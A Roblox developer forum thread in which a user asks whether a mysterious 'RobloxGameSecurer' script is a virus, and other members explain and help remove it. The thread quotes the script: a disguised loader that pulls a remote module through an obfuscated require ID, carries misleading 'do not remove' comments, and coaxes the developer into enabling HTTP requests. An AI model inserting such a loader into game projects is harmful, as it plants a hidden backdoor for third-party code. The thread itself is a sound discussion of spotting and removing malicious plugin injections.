Is "RobloxGameSecurer" a VIRUS?

Help and Feedback Scripting Support
#1

(Sorry if this post in the wrong category)

Hey Devs,
(almost) every time I play my game, this script appears:

image

And this is what’s inside the script:

-- This script runs the game securer do not remove this!
-- it has been placed in here just incase you remove it
require(0x146ec9ad4)



-- This is a http checker it will automatically delete once you enable http requests
local studio = game:GetService("RunService"):IsStudio()
function check()
	local success,error = pcall(function()
		game:GetService("HttpService"):GetAsync("https://www.google.com/")
	end)
	if success then
		return "true"
	else
		return "false"
	end
end
if studio and check() ~= "true" then
	local h = Instance.new("Hint",workspace)
	h.Text = "Http Services Arent Enabled, To enable them, go to the Home tab, Game settings button, options tab, and select the On option under Allow HTTP Requests"
end
if check() == "true" then
	script:Destroy()
end

It keeps throwing this error:

image
image1119×21 4.93 KB

So I’m not really sure if it’s a virus or not.

#2

If you didn’t create this I would check your plugins to make sure nothing is a program to add this in and delete the script. This isn’t a script made by Roblox. The script is very suspicious so probably a virus.

4 Likes
#3

Defiantly isn’t a Roblox script. It wouldn’t just appear there out of nowhere. I’d recommend you check your plugins for any false ones and remove the script out of your game.

#4

The script doesn’t appear in any newer games I made

#5

In this case you or Roblox Staff might have already deleted the false plugin. Still would delete the script out of your game.

#6

It’s most likely a virus. Everything in the script screams virus.

#7

I added a script that checks for the suspicous script and deletes it if it’s there

#8

Well if that script didn’t detect this as virus then it doesn’t seem to work because this defiantly is a virus based on how it looks like.

#9

image
image849×238 18.5 KB

Hopefully this helps

1 Like
#10

If this keeps appearing after you delete it. You need to identify the source of where it coming from.

#11

I’d still recommend you to check your Roblox Plugin Inventory for any suspecious plugins. Usually you can detect them by small amount of likes, or big amount of dislikes, small amount of favourites but big amount of likes. Theres alot of ways to see suspecious Plugins. If you do find one I’d recommend to remove that from your Inventory and check if the script still appears in your game.

(Incase after you deleted a plugin and the script still appears, you can re-install the plugin and search for a different plugin that could be the source)

1 Like
#12

Alright thanks

Solution:
This script is most definitly a * virus * so I recommend everyone who has this in their game to DELETE it…

Thanks for helping, @nvckx and @LiquifySlashes :wink:

3 Likes
#13

Out of curiosity, what does the script look like it does? I’m not very experienced when it comes to identifying virus scripts.

#14

First, it requires a module from somewhere. The module that it gets is where the real virus script is. It’s obscured like this to keep the developer from noticing that something is wrong.

Then, it checks for HTTP access, probably because the virus needs HTTP to function. This is here because it looks less suspicious to see the HTTP check in an unrelated empty script than next to a bunch of unfamiliar code.

Also, as a general rule of thumb, remember that big tech companies will always spell check their messages. The grammatical/format mistakes in the comments mean that it is definitely not written by Roblox. This rule also applies for many scams, so it’s useful to know.

1 Like
#15

Also, if you attempted to use a pirated copy of a plugin, it likely has a virus. It’s quite common for people to steal a plugin, put a virus in it, and then publish it for free.

1 Like
#16

FYI, Roblox doesnt insert any scripts into your workspace/ServerScriptService. Only some at runtime which you wouldn’t even see during editing.

#17

It’s located in terrain which is very weird…

#18

This is not a virus. It does nothing other than require obsolete material and check if HTTP services work.

#19

Yeah no, thats definitely a virus. And even if it wasn’t why would it be located in terrain? This is most likely a virus since terrain is the last spot people would check.

#20

I meant that the model it refers to was deleted so it can no longer do harm.